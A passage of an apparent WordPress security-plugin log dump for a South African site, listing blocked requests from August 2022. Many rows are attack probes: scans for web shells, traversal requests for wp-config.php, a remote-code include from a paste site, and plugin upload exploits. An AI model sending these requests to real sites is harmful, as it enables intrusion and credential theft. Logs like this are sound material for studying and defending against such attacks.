01:38:04','20.127.40.224','https://www.smithandsmith.co.za/wp-content/iu.php','404shield',''),(7637,'2022-08-04 01:40:54','20.127.40.224','https://www.smithandsmith.co.za/wp-content/codeboy1877_up.php','404shield',''),(7638,'2022-08-04 01:40:56','20.127.40.224','https://www.smithandsmith.co.za/wp-admin/codeboy1877_up.php','404shield',''),(7639,'2022-08-04 03:32:43','20.38.2.17','https://smithandsmith.co.za/wp-login.php?wp_lang=en_US&action=lostpassword','404shield',''),(7640,'2022-08-04 03:52:30','20.254.96.54','https://smithandsmith.co.za/wp-admin.php','404shield',''),(7641,'2022-08-04 08:15:05','104.244.78.213','http://smithandsmith.co.za/contact/','httpbl',''),(7642,'2022-08-04 12:23:03','20.25.157.59','https://www.smithandsmith.co.za/wp-admin/style.php','404shield',''),(7643,'2022-08-04 12:33:32','20.25.157.59','https://www.smithandsmith.co.za/wp-content/export.php','404shield',''),(7644,'2022-08-04 12:45:00','20.25.157.59','https://www.smithandsmith.co.za/wp-content/plugins/backup_index.php','404shield',''),(7645,'2022-08-04 12:45:17','20.25.157.59','https://www.smithandsmith.co.za/wp-content/mu-plugins/db-safe-mode.php','404shield',''),(7646,'2022-08-04 12:52:00','20.25.157.59','https://www.smithandsmith.co.za/wp-content/themes/config.bak.php','404shield',''),(7647,'2022-08-04 13:13:23','70.37.162.140','https://www.smithandsmith.co.za/wp-admin/leaf.php','404shield',''),(7648,'2022-08-04 13:13:24','70.37.162.140','https://www.smithandsmith.co.za/wp-content/leafmailer2.8.php','404shield',''),(7649,'2022-08-04 13:13:25','70.37.162.140','https://www.smithandsmith.co.za/wp-admin/leafmailer2.8.php','404shield',''),(7650,'2022-08-04 16:16:15','223.229.227.30','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(7651,'2022-08-04 16:21:23','34.122.156.45','https://www.smithandsmith.co.za/wp-admin/Deadcode1975xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php%20=%20%3E%3E%20shell%20no%20work','404shield',''),(7652,'2022-08-04 16:21:24','34.122.156.45','https://www.smithandsmith.co.za/wp-content/Deadcode1975xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php%20=%20%3E%3E%20shell%20no%20work','404shield',''),(7653,'2022-08-04 16:21:27','34.122.156.45','https://www.smithandsmith.co.za/wp-content/fw.php','404shield',''),(7654,'2022-08-04 18:37:32','51.142.150.0','https://www.smithandsmith.co.za/wp-content/includes/uploads/Va.php','404shield',''),(7655,'2022-08-04 18:37:32','51.142.150.0','https://www.smithandsmith.co.za/wp-content/uploads/readindex.php','404shield',''),(7656,'2022-08-04 18:37:33','51.142.150.0','https://www.smithandsmith.co.za/wp-content/uploads/small.php','404shield',''),(7657,'2022-08-04 20:16:54','128.199.109.135','https://smithandsmith.co.za/wp-login.php','404shield',''),(7658,'2022-08-05 00:13:20','217.79.178.53','http://smithandsmith.co.za/contact/','httpbl',''),(7659,'2022-08-05 00:13:21','217.79.178.53','http://smithandsmith.co.za/','httpbl',''),(7660,'2022-08-05 00:45:09','185.220.100.240','https://smithandsmith.co.za/contact','httpbl',''),(7661,'2022-08-05 00:45:11','185.220.100.240','https://smithandsmith.co.za/','httpbl',''),(7662,'2022-08-05 02:14:11','51.142.150.0','https://www.smithandsmith.co.za/wp-admin/style.php','404shield',''),(7663,'2022-08-05 02:14:32','51.142.150.0','https://www.smithandsmith.co.za/wp-content/mu-plugins-old/index.php?f=/NmRtJOUjAdutReQj/scRjKUhleBpzmTyO.txt','404shield',''),(7664,'2022-08-05 02:14:39','51.142.150.0','https://www.smithandsmith.co.za/wp-admin.php?daksldlkdsadas=1','404shield',''),(7665,'2022-08-05 02:49:50','20.254.96.54','https://smithandsmith.co.za/wp-content/themes/sketch/404.php','404shield',''),(7666,'2022-08-05 04:14:57','20.231.60.37','https://www.smithandsmith.co.za/wp-admin/style.php','404shield',''),(7667,'2022-08-05 04:15:04','20.231.60.37','https://www.smithandsmith.co.za/wp-content/mu-plugins-old/index.php?f=/NmRtJOUjAdutReQj/scRjKUhleBpzmTyO.txt','404shield',''),(7668,'2022-08-05 04:15:10','20.231.60.37','https://www.smithandsmith.co.za/wp-admin.php?daksldlkdsadas=1','404shield',''),(7669,'2022-08-05 05:43:36','20.254.96.54','https://smithandsmith.co.za/wp-admin.php','404shield',''),(7670,'2022-08-05 10:33:43','152.89.196.102','https://smithandsmith.co.za/wp-content/plugins/apikey/apikey.php?test=hello','404shield',''),(7671,'2022-08-05 10:51:26','51.142.150.0','https://www.smithandsmith.co.za/wp-admin/style.php','404shield',''),(7672,'2022-08-05 10:51:35','51.142.150.0','https://www.smithandsmith.co.za/wp-content/export.php','404shield',''),(7673,'2022-08-05 10:51:41','51.142.150.0','https://www.smithandsmith.co.za/wp-content/plugins/backup_index.php','404shield',''),(7674,'2022-08-05 14:47:10','20.231.60.37','https://www.smithandsmith.co.za/wp-admin/style.php','404shield',''),(7675,'2022-08-05 14:47:24','20.231.60.37','https://www.smithandsmith.co.za/wp-content/export.php','404shield',''),(7676,'2022-08-05 14:47:37','20.231.60.37','https://www.smithandsmith.co.za/wp-content/plugins/backup_index.php','404shield',''),(7677,'2022-08-05 17:36:59','167.71.63.47','https://smithandsmith.co.za/wp-login.php','404shield',''),(7678,'2022-08-05 18:51:25','20.163.84.241','https://www.smithandsmith.co.za/wp-admin/setup-config.php','404shield',''),(7679,'2022-08-05 23:36:09','107.182.129.194','https://www.smithandsmith.co.za//wp-admin/admin-ajax.php','404shield',''),(7680,'2022-08-05 23:36:23','107.182.129.194','https://www.smithandsmith.co.za//wp-content/uploads/typehub/custom/tnyzjasj/bala.php','404shield',''),(7681,'2022-08-05 23:36:44','107.182.129.194','https://www.smithandsmith.co.za//wp-content/plugins/ioptimizations/IOptimizes.php?hamlorszd','404shield',''),(7682,'2022-08-06 01:55:07','194.38.20.161','https://smithandsmith.co.za/wp-content/plugins/wp-front-end-repository/js/uploadify/uploadify.css','404shield',''),(7683,'2022-08-06 08:50:01','212.154.57.232','https://www.smithandsmith.co.za/wp-content/mu-plugins-old/index.php?f=/bmLUxZLeaiRIek7s/umvUsXN4HVg3BzRf.txt','404shield',''),(7684,'2022-08-06 08:52:17','212.154.57.232','https://www.smithandsmith.co.za/wp-content/mu-plugins-old/index.php?f=/bmLUxZLeaiRIek7s/umvUsXN4HVg3BzRf.txt','404shield',''),(7685,'2022-08-06 09:25:15','20.254.96.54','https://smithandsmith.co.za/wp-content/themes/sketch/404.php','404shield',''),(7686,'2022-08-06 09:25:43','20.254.96.54','https://smithandsmith.co.za/wp-content/themes/twentyfive/include.php','404shield',''),(7687,'2022-08-06 10:10:32','194.38.20.161','https://smithandsmith.co.za/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/css/jquery.lightbox-0.5.css','404shield',''),(7688,'2022-08-06 10:25:15','18.119.88.61','https://www.smithandsmith.co.za/wp-admin/Deadcode1975xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php%20=%20%3E%3E%20shell%20no%20work','404shield',''),(7689,'2022-08-06 10:25:16','18.119.88.61','https://www.smithandsmith.co.za/wp-content/Deadcode1975xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php%20=%20%3E%3E%20shell%20no%20work','404shield',''),(7690,'2022-08-06 10:25:19','18.119.88.61','https://www.smithandsmith.co.za/wp-content/fw.php','404shield',''),(7691,'2022-08-06 11:57:06','13.76.132.231','https://smithandsmith.co.za/wp-login.php','404shield',''),(7692,'2022-08-06 17:37:19','20.216.30.62','https://www.smithandsmith.co.za/wp-content/includes/uploads/Va.php','404shield',''),(7693,'2022-08-06 17:37:19','20.216.30.62','https://www.smithandsmith.co.za/wp-content/uploads/readindex.php','404shield',''),(7694,'2022-08-06 17:37:19','20.216.30.62','https://www.smithandsmith.co.za/wp-content/uploads/small.php','404shield',''),(7695,'2022-08-06 19:21:20','5.182.209.135','https://smithandsmith.co.za/wp-login.php','404shield',''),(7696,'2022-08-06 22:43:57','20.216.30.62','https://www.smithandsmith.co.za/wp-content/includes/uploads/Va.php','404shield',''),(7697,'2022-08-06 22:43:57','20.216.30.62','https://www.smithandsmith.co.za/wp-content/uploads/readindex.php','404shield',''),(7698,'2022-08-06 22:43:58','20.216.30.62','https://www.smithandsmith.co.za/wp-content/uploads/small.php','404shield',''),(7699,'2022-08-07 00:43:14','194.38.20.161','https://smithandsmith.co.za/wp-content/plugins/awesome-support/plugins/jquery.fineuploader-3.5.0/server/php/example.php','404shield',''),(7700,'2022-08-07 07:27:07','20.119.165.74','https://smithandsmith.co.za/wp-login.php','404shield',''),(7701,'2022-08-07 07:27:07','20.119.165.74','https://smithandsmith.co.za/wp-login.php','404shield',''),(7702,'2022-08-07 07:27:07','20.119.165.74','https://smithandsmith.co.za/wp-login.php','404shield',''),(7703,'2022-08-07 07:34:32','20.189.112.171','https://smithandsmith.co.za/wp-login.php','404shield',''),(7704,'2022-08-07 07:34:32','20.189.112.171','https://smithandsmith.co.za/wp-login.php','404shield',''),(7705,'2022-08-07 07:34:32','20.189.112.171','https://smithandsmith.co.za/wp-login.php','404shield',''),(7706,'2022-08-07 09:17:40','194.38.20.161','https://smithandsmith.co.za/wp-content/plugins/front-end-editor/lib/aloha-editor/plugins/extra/draganddropfiles/demo/index.css','404shield',''),(7707,'2022-08-07 13:03:58','20.119.165.74','http://smithandsmith.co.za/','muashield',''),(7708,'2022-08-07 13:03:59','20.119.165.74','http://smithandsmith.co.za/','muashield',''),(7709,'2022-08-07 13:04:00','20.119.165.74','http://smithandsmith.co.za/index.php/component/users','sessionshield',''),(7710,'2022-08-07 15:04:56','70.37.162.140','https://www.smithandsmith.co.za/wp-admin/leaf.php','404shield',''),(7711,'2022-08-07 15:04:57','70.37.162.140','https://www.smithandsmith.co.za/wp-content/leafmailer2.8.php','404shield',''),(7712,'2022-08-07 15:04:58','70.37.162.140','https://www.smithandsmith.co.za/wp-admin/leafmailer2.8.php','404shield',''),(7713,'2022-08-07 18:07:50','20.189.112.171','https://smithandsmith.co.za/wp-login.php','404shield',''),(7714,'2022-08-07 18:07:50','20.189.112.171','https://smithandsmith.co.za/wp-login.php','404shield',''),(7715,'2022-08-07 18:07:50','20.189.112.171','https://smithandsmith.co.za/wp-login.php','404shield',''),(7716,'2022-08-07 19:58:39','159.203.31.171','https://smithandsmith.co.za/wp-login.php','404shield',''),(7717,'2022-08-08 16:44:54','20.216.30.62','https://www.smithandsmith.co.za/wp-content/includes/uploads/Va.php','404shield',''),(7718,'2022-08-08 16:44:54','20.216.30.62','https://www.smithandsmith.co.za/wp-content/uploads/readindex.php','404shield',''),(7719,'2022-08-08 16:44:55','20.216.30.62','https://www.smithandsmith.co.za/wp-content/uploads/small.php','404shield',''),(7720,'2022-08-08 18:47:40','103.90.232.106','https://smithandsmith.co.za/wp-login.php','404shield',''),(7721,'2022-08-09 00:02:33','194.38.20.161','https://smithandsmith.co.za/wp-content/plugins/fluid_forms/file-upload/server/php/index.php?file=tf2rghf.jpg','404shield',''),(7722,'2022-08-09 02:43:53','20.7.195.208','http://www.smithandsmith.co.za/','muashield',''),(7723,'2022-08-09 02:43:53','20.7.195.208','http://www.smithandsmith.co.za/','muashield',''),(7724,'2022-08-09 02:43:56','20.7.195.208','http://www.smithandsmith.co.za/index.php/component/users','sessionshield',''),(7725,'2022-08-09 13:39:13','20.25.186.104','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(7726,'2022-08-09 14:40:13','178.159.37.156','https://www.smithandsmith.co.za/wp-admin/css/','404shield',''),(7727,'2022-08-09 17:03:22','192.227.178.147','https://smithandsmith.co.za/wp-login.php','404shield',''),(7728,'2022-08-09 23:20:29','185.220.102.241','http://smithandsmith.co.za/contact/','httpbl',''),(7729,'2022-08-09 23:20:30','185.220.102.241','http://smithandsmith.co.za/','httpbl',''),(7730,'2022-08-10 00:21:52','20.70.190.233','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(7731,'2022-08-10 16:39:02','85.128.143.215','https://smithandsmith.co.za/wp-login.php','404shield',''),(7732,'2022-08-10 20:46:47','178.159.37.156','https://www.smithandsmith.co.za/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello','404shield',''),(7733,'2022-08-10 20:47:02','178.159.37.156','https://www.smithandsmith.co.za/wp-content/plugins/backup_index.php','404shield',''),(7734,'2022-08-10 20:47:04','178.159.37.156','https://www.smithandsmith.co.za/wp-content/db_cache.php','404shield',''),(7735,'2022-08-10 22:57:52','185.14.233.20','https://smithandsmith.co.za/wp-login.php','404shield',''),(7736,'2022-08-11 00:28:15','185.220.101.47','http://smithandsmith.co.za/contact/','httpbl',''),(7737,'2022-08-11 00:28:25','89.58.27.84','https://smithandsmith.co.za/','httpbl',''),(7738,'2022-08-11 00:52:24','194.38.20.161','https://smithandsmith.co.za/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php','404shield',''),(7739,'2022-08-11 02:54:39','20.7.195.208','https://www.smithandsmith.co.za/wp-content/themes/sketch/404.php','404shield',''),(7740,'2022-08-11 02:54:59','20.7.195.208','https://www.smithandsmith.co.za/wp-content/themes/twentyfive/include.php','404shield',''),(7741,'2022-08-11 03:44:57','185.220.100.254','http://smithandsmith.co.za/contact/','httpbl',''),(7742,'2022-08-11 03:44:57','185.220.100.254','http://smithandsmith.co.za/','httpbl',''),(7743,'2022-08-11 04:47:20','20.108.183.58','http://smithandsmith.co.za/','muashield',''),(7744,'2022-08-11 04:47:21','20.108.183.58','http://smithandsmith.co.za/','muashield',''),(7745,'2022-08-11 04:47:23','20.108.183.58','http://smithandsmith.co.za/index.php/component/users','sessionshield',''),(7746,'2022-08-11 05:00:17','185.220.101.164','https://smithandsmith.co.za/contact/','httpbl',''),(7747,'2022-08-11 09:28:07','194.38.20.161','https://smithandsmith.co.za/wp-content/plugins/wp-copysafe-pdf/lib/uploadify/uploadify.css','404shield',''),(7748,'2022-08-11 16:52:41','5.161.136.134','https://www.smithandsmith.co.za/wp-admin.php','404shield',''),(7749,'2022-08-11 16:52:43','5.161.136.134','https://www.smithandsmith.co.za/wp-content/plugins/wp-diambar/includes/loadme.php','404shield',''),(7750,'2022-08-11 16:52:43','5.161.136.134','https://www.smithandsmith.co.za/wp-content/plugins/zaen/includes/loadme.php','404shield',''),(7751,'2022-08-11 19:39:09','103.57.221.203','https://smithandsmith.co.za/wp-admin/css/colors/blue/wp-logs.php?sexx=sec','404shield',''),(7752,'2022-08-11 20:25:11','72.29.76.78','https://smithandsmith.co.za/wp-login.php','404shield',''),(7753,'2022-08-12 01:10:54','51.142.196.58','https://www.smithandsmith.co.za/wp-admin/style.php','404shield',''),(7754,'2022-08-12 01:11:07','51.142.196.58','https://www.smithandsmith.co.za/wp-content/mu-plugins-old/index.php?f=/NmRtJOUjAdutReQj/scRjKUhleBpzmTyO.txt','404shield',''),(7755,'2022-08-12 01:11:18','51.142.196.58','https://www.smithandsmith.co.za/wp-admin.php?daksldlkdsadas=1','404shield',''),(7756,'2022-08-12 07:53:52','20.111.43.233','https://www.smithandsmith.co.za/wp-content/plugins/upspy/index.php','404shield',''),(7757,'2022-08-12 07:53:53','20.111.43.233','https://www.smithandsmith.co.za/wp-content/plugins/ubh/index.php','404shield',''),(7758,'2022-08-12 07:53:54','20.111.43.233','https://www.smithandsmith.co.za/wp-content/plugins/vwcleanerplugin/bump.php?cache','404shield',''),(7759,'2022-08-12 15:26:19','43.154.101.39','https://smithandsmith.co.za/wp-login.php','404shield',''),(7760,'2022-08-12 16:10:23','128.199.205.115','https://smithandsmith.co.za/wp-login.php','404shield',''),(7761,'2022-08-12 20:06:00','20.193.135.50','https://www.smithandsmith.co.za/wp-admin/css/','404shield',''),(7762,'2022-08-12 22:27:42','20.111.43.233','https://www.smithandsmith.co.za/wp-admin/style.php','404shield',''),(7763,'2022-08-12 22:27:49','20.111.43.233','https://www.smithandsmith.co.za/wp-content/export.php','404shield',''),(7764,'2022-08-12 22:27:54','20.111.43.233','https://www.smithandsmith.co.za/wp-content/plugins/backup_index.php','404shield',''),(7765,'2022-08-13 01:21:20','194.38.20.161','https://smithandsmith.co.za/wp-content/plugins/formcraft/file-upload/server/php/upload.php','404shield',''),(7766,'2022-08-13 14:59:51','45.83.123.36','https://www.smithandsmith.co.za/wp-admin.php','404shield',''),(7767,'2022-08-13 15:00:40','45.83.123.36','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(7768,'2022-08-13 15:01:52','45.83.123.36','https://www.smithandsmith.co.za/wp-content/plugins/shell/d2.php','404shield',''),(7769,'2022-08-14 05:14:54','8.218.129.235','https://smithandsmith.co.za/wp-login.php','404shield',''),(7770,'2022-08-14 11:27:05','217.160.70.250','https://smithandsmith.co.za/wp-content/plugins/instabuilder2/assets/css/instabuilder2.css','404shield',''),(7771,'2022-08-14 12:37:28','194.38.20.161','https://smithandsmith.co.za/wp-content/plugins/formcraft/file-upload/server/content/upload.php','404shield',''),(7772,'2022-08-14 14:10:22','89.58.27.84','https://smithandsmith.co.za/contact/','httpbl',''),(7773,'2022-08-14 17:22:16','143.110.137.82','https://smithandsmith.co.za/wp-login.php','404shield',''),(7774,'2022-08-14 17:37:57','217.160.70.250','https://www.smithandsmith.co.za/wp-content/plugins/instabuilder2/assets/css/instabuilder2.css','404shield',''),(7775,'2022-08-15 09:35:09','212.237.123.229','https://smithandsmith.co.za/wp-admin/style.php','404shield',''),(7776,'2022-08-15 09:35:35','212.237.123.229','https://smithandsmith.co.za/wp-content/export.php','404shield',''),(7777,'2022-08-15 09:35:47','212.237.123.229','https://smithandsmith.co.za/wp-content/plugins/backup_index.php','404shield',''),(7778,'2022-08-15 18:08:19','93.177.120.10','https://smithandsmith.co.za/wp-login.php','404shield',''),(7779,'2022-08-16 01:47:52','194.38.20.161','https://smithandsmith.co.za/wp-content/plugins/formcraft/file-upload/server/php/index.php?file=tf2rghf.jpg','404shield',''),(7780,'2022-08-16 03:42:09','152.89.196.13','https://smithandsmith.co.za/wp-content/plugins/apikey/apikey.php?test=hello','404shield',''),(7781,'2022-08-16 16:24:35','64.235.231.20','https://smithandsmith.co.za/wp-login.php','404shield',''),(7782,'2022-08-16 21:37:23','82.165.241.50','https://smithandsmith.co.za/wp-content/plugins/instabuilder2/assets/css/instabuilder2.css','404shield',''),(7783,'2022-08-16 21:57:13','20.168.0.199','https://www.smithandsmith.co.za/wp-admin/style.php','404shield',''),(7784,'2022-08-16 21:57:31','20.168.0.199','https://www.smithandsmith.co.za/wp-content/export.php','404shield',''),(7785,'2022-08-16 21:57:45','20.168.0.199','https://www.smithandsmith.co.za/wp-content/plugins/backup_index.php','404shield',''),(7786,'2022-08-16 22:35:16','20.168.30.34','https://www.smithandsmith.co.za/wp-admin/style.php','404shield',''),(7787,'2022-08-16 22:37:14','20.168.30.34','https://www.smithandsmith.co.za/wp-content/export.php','404shield',''),(7788,'2022-08-16 22:37:30','20.168.30.34','https://www.smithandsmith.co.za/wp-content/plugins/backup_index.php','404shield',''),(7789,'2022-08-17 00:28:50','54.92.233.219','https://www.smithandsmith.co.za/wp-content/includes/uploads/Va.php','404shield',''),(7790,'2022-08-17 00:28:51','54.92.233.219','https://www.smithandsmith.co.za/wp-content/uploads/readindex.php','404shield',''),(7791,'2022-08-17 00:28:53','54.92.233.219','https://www.smithandsmith.co.za/wp-content/uploads/small.php','404shield',''),(7792,'2022-08-17 02:33:19','20.125.135.85','https://www.smithandsmith.co.za/wp-content/plugins/upspy/index.php','404shield',''),(7793,'2022-08-17 02:33:21','20.125.135.85','https://www.smithandsmith.co.za/wp-content/plugins/ubh/index.php','404shield',''),(7794,'2022-08-17 02:33:23','20.125.135.85','https://www.smithandsmith.co.za/wp-content/plugins/vwcleanerplugin/bump.php?cache','404shield',''),(7795,'2022-08-17 10:26:08','20.196.64.222','https://www.smithandsmith.co.za/wp-content/includes/uploads/Va.php','404shield',''),(7796,'2022-08-17 10:26:08','20.196.64.222','https://www.smithandsmith.co.za/wp-content/uploads/readindex.php','404shield',''),(7797,'2022-08-17 10:26:09','20.196.64.222','https://www.smithandsmith.co.za/wp-content/uploads/small.php','404shield',''),(7798,'2022-08-17 11:06:56','212.227.213.151','https://www.smithandsmith.co.za/wp-content/plugins/instabuilder2/assets/css/instabuilder2.css','404shield',''),(7799,'2022-08-17 11:53:11','51.142.181.246','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(7800,'2022-08-17 16:09:34','20.100.172.220','https://www.smithandsmith.co.za/wp-admin/leaf.php','404shield',''),(7801,'2022-08-17 16:09:36','20.100.172.220','https://www.smithandsmith.co.za/wp-content/leafmailer2.8.php','404shield',''),(7802,'2022-08-17 16:09:36','20.100.172.220','https://www.smithandsmith.co.za/wp-admin/leafmailer2.8.php','404shield',''),(7803,'2022-08-17 16:54:20','159.65.251.222','https://smithandsmith.co.za/wp-login.php','404shield',''),(7804,'2022-08-17 18:48:14','20.125.135.85','https://www.smithandsmith.co.za/wp-content/plugins/upspy/index.php','404shield',''),(7805,'2022-08-17 18:48:16','20.125.135.85','https://www.smithandsmith.co.za/wp-content/plugins/ubh/index.php','404shield',''),(7806,'2022-08-17 18:48:18','20.125.135.85','https://www.smithandsmith.co.za/wp-content/plugins/vwcleanerplugin/bump.php?cache','404shield',''),(7807,'2022-08-17 20:42:27','20.125.135.85','https://www.smithandsmith.co.za/wp-content/plugins/upspy/index.php','404shield',''),(7808,'2022-08-17 20:42:33','20.125.135.85','https://www.smithandsmith.co.za/wp-content/plugins/ubh/index.php','404shield',''),(7809,'2022-08-17 20:42:36','20.125.135.85','https://www.smithandsmith.co.za/wp-content/plugins/vwcleanerplugin/bump.php?cache','404shield',''),(7810,'2022-08-18 01:55:13','103.27.77.74','https://www.smithandsmith.co.za/wp-admin.php','404shield',''),(7811,'2022-08-18 02:13:54','82.165.241.50','https://www.smithandsmith.co.za/wp-content/plugins/instabuilder2/assets/css/instabuilder2.css','404shield',''),(7812,'2022-08-18 03:37:28','20.163.104.189','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(7813,'2022-08-18 05:00:44','212.227.213.151','https://smithandsmith.co.za/wp-content/plugins/instabuilder2/assets/css/instabuilder2.css','404shield',''),(7814,'2022-08-18 15:51:27','20.163.21.73','https://www.smithandsmith.co.za/wp-content/plugins/upspy/index.php','404shield',''),(7815,'2022-08-18 15:51:30','20.163.21.73','https://www.smithandsmith.co.za/wp-content/plugins/ubh/index.php','404shield',''),(7816,'2022-08-18 15:51:31','20.163.21.73','https://www.smithandsmith.co.za/wp-content/plugins/vwcleanerplugin/bump.php?cache','404shield',''),(7817,'2022-08-18 20:43:39','182.73.178.182','https://smithandsmith.co.za/wp-login.php','404shield',''),(7818,'2022-08-18 20:43:39','182.73.178.182','https://smithandsmith.co.za/wp-login.php','404shield',''),(7819,'2022-08-18 20:43:39','182.73.178.182','https://smithandsmith.co.za/wp-login.php','404shield',''),(7820,'2022-08-19 00:31:58','103.111.30.40','https://smithandsmith.co.za/wp-login.php','404shield',''),(7821,'2022-08-19 00:49:51','20.168.0.199','https://www.smithandsmith.co.za/wp-content/includes/uploads/Va.php','404shield',''),(7822,'2022-08-19 00:49:52','20.168.0.199','https://www.smithandsmith.co.za/wp-content/uploads/readindex.php','404shield',''),(7823,'2022-08-19 00:49:52','20.168.0.199','https://www.smithandsmith.co.za/wp-content/uploads/small.php','404shield',''),(7824,'2022-08-19 15:46:43','39.98.207.234','https://smithandsmith.co.za/wp-login.php','404shield',''),(7825,'2022-08-20 09:38:10','212.227.213.151','https://www.smithandsmith.co.za//wp-admin/admin-post.php','404shield',''),(7826,'2022-08-20 09:38:11','212.227.213.151','https://www.smithandsmith.co.za//wp-content/plugins/instabuilder2/cache/up.php','404shield',''),(7827,'2022-08-20 09:38:12','212.227.213.151','https://www.smithandsmith.co.za//wp-admin/admin-ajax.php','404shield',''),(7828,'2022-08-20 20:08:36','20.168.98.167','https://www.smithandsmith.co.za/wp-admin/setup-config.php','404shield',''),(7829,'2022-08-21 00:37:32','194.38.20.161','https://smithandsmith.co.za/wp-content/plugins/simple-ads-manager/css/jslider.round.plastic.css','404shield',''),(7830,'2022-08-21 01:01:45','147.78.47.233','https://smithandsmith.co.za/wp-login.php','404shield',''),(7831,'2022-08-21 04:42:50','51.142.240.159','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(7832,'2022-08-21 16:33:48','80.77.135.125','https://smithandsmith.co.za/wp-login.php','404shield',''),(7833,'2022-08-21 22:05:56','212.227.213.151','https://smithandsmith.co.za/wp-content/themes/un.php?php=https://textbin.net/raw/k9bbqot3ml','404shield',''),(7834,'2022-08-22 19:43:56','5.182.209.135','https://smithandsmith.co.za/wp-login.php','404shield',''),(7835,'2022-08-22 20:35:48','20.193.135.50','https://www.smithandsmith.co.za/wp-admin/css/','404shield',''),(7836,'2022-08-23 00:13:52','23.96.121.207','https://www.smithandsmith.co.za/wp-admin/style.php','404shield',''),(7837,'2022-08-23 00:14:07','23.96.121.207','https://www.smithandsmith.co.za/wp-content/mu-plugins-old/index.php?f=/NmRtJOUjAdutReQj/scRjKUhleBpzmTyO.txt','404shield',''),(7838,'2022-08-23 00:14:25','23.96.121.207','https://www.smithandsmith.co.za/wp-admin.php?daksldlkdsadas=1','404shield',''),(7839,'2022-08-23 00:21:48','194.38.20.161','https://smithandsmith.co.za/wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/js/main.js','404shield',''),(7840,'2022-08-23 17:50:41','104.243.37.207','https://www.smithandsmith.co.za//wp-admin/admin-post.php','404shield',''),(7841,'2022-08-23 17:50:46','104.243.37.207','https://www.smithandsmith.co.za//wp-content/plugins/instabuilder2/cache/up.php','404shield',''),(7842,'2022-08-24 06:40:59','212.77.32.166','https://smithandsmith.co.za/wp-login.php','404shield',''),(7843,'2022-08-24 07:29:57','194.38.20.161','https://smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','404shield',''),(7844,'2022-08-24 08:46:03','64.235.231.20','https://smithandsmith.co.za/wp-login.php','404shield',''),(7845,'2022-08-24 19:01:35','188.213.66.7','https://smithandsmith.co.za/wp-login.php','404shield',''),(7846,'2022-08-24 22:06:59','51.142.181.246','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(7847,'2022-08-24 23:51:38','20.163.108.153','https://www.smithandsmith.co.za/wp-admin/style.php','404shield',''),(7848,'2022-08-24 23:52:13','20.163.108.153','https://www.smithandsmith.co.za/wp-content/export.php','404shield',''),(7849,'2022-08-24 23:52:29','20.163.108.153','https://www.smithandsmith.co.za/wp-content/plugins/backup_index.php','404shield',''),(7850,'2022-08-25 16:20:17','54.183.179.198','https://smithandsmith.co.za/wp-content/ALFA_DATA/alfacgiapi/perl.alfa','404shield',''),(7851,'2022-08-25 16:20:18','54.183.179.198','https://smithandsmith.co.za/wp-content/alfacgiapi/perl.alfa','404shield',''),(7852,'2022-08-25 18:03:14','85.10.202.125','https://smithandsmith.co.za/wp-login.php','404shield',''),(7853,'2022-08-26 04:32:31','51.15.183.168','https://smithandsmith.co.za/wp-admin/admin-ajax.php?action=kbslider_show_image&img=..%2Fwp-config.php','404shield',''),(7854,'2022-08-26 04:32:37','51.15.183.168','https://smithandsmith.co.za/wp-admin/admin-ajax.php?action=woof_redraw_woof&shortcode=..%2Fwp-config.php','404shield',''),(7855,'2022-08-26 04:32:46','51.15.183.168','https://smithandsmith.co.za/wp-admin/admin-ajax.php?jvfrm_spot_get_json&fn=..%2Fwp-config.php','404shield',''),(7856,'2022-08-26 19:44:57','51.79.78.41','https://smithandsmith.co.za/wp-login.php','404shield',''),(7857,'2022-08-27 00:04:13','212.227.213.151','https://www.smithandsmith.co.za//wp-content/plugins/dzs-zoomsounds/savepng.php?location=a57bze8931.php','404shield',''),(7858,'2022-08-27 00:04:17','212.227.213.151','https://www.smithandsmith.co.za//wp-content/plugins/dzs-zoomsounds/a57bze8931.php','404shield',''),(7859,'2022-08-27 00:04:21','212.227.213.151','https://www.smithandsmith.co.za//wp-content/plugins/ioptimizations/IOptimizes.php?hamlorszd','404shield',''),(7860,'2022-08-27 19:48:23','216.245.215.122','https://smithandsmith.co.za/wp-login.php','404shield',''),(7861,'2022-08-28 16:02:47','167.235.10.104','https://smithandsmith.co.za/wp-admin/style.php','404shield',''),(7862,'2022-08-28 16:03:22','167.235.10.104','https://smithandsmith.co.za/wp-content/export.php','404shield',''),(7863,'2022-08-28 16:03:38','167.235.10.104','https://smithandsmith.co.za/wp-content/plugins/backup_index.php','404shield',''),(7864,'2022-08-28 16:59:30','20.163.108.143','https://smithandsmith.co.za/wp-login.php','404shield',''),(7865,'2022-08-28 16:59:30','20.163.108.143','https://smithandsmith.co.za/wp-login.php','404shield',''),(7866,'2022-08-28 16:59:30','20.163.108.143','https://smithandsmith.co.za/wp-login.php','404shield',''),(7867,'2022-08-28 17:09:08','104.244.122.63','https://smithandsmith.co.za/wp-login.php','404shield',''),(7868,'2022-08-29 00:27:30','20.168.40.67','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(7869,'2022-08-29 07:39:59','91.191.209.74','https://www.smithandsmith.co.za/wp-admin/style.php','404shield',''),(7870,'2022-08-29 07:40:34','91.191.209.74','https://www.smithandsmith.co.za/wp-content/mu-plugins-old/index.php?f=/NmRtJOUjAdutReQj/scRjKUhleBpzmTyO.txt','404shield',''),(7871,'2022-08-29 07:41:05','91.191.209.74','https://www.smithandsmith.co.za/wp-admin.php?daksldlkdsadas=1','404shield',''),(7872,'2022-08-29 18:57:53','185.238.2.74','https://www.smithandsmith.co.za/wp-admin.php','404shield',''),(7873,'2022-08-29 18:58:35','185.238.2.74','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(7874,'2022-08-29 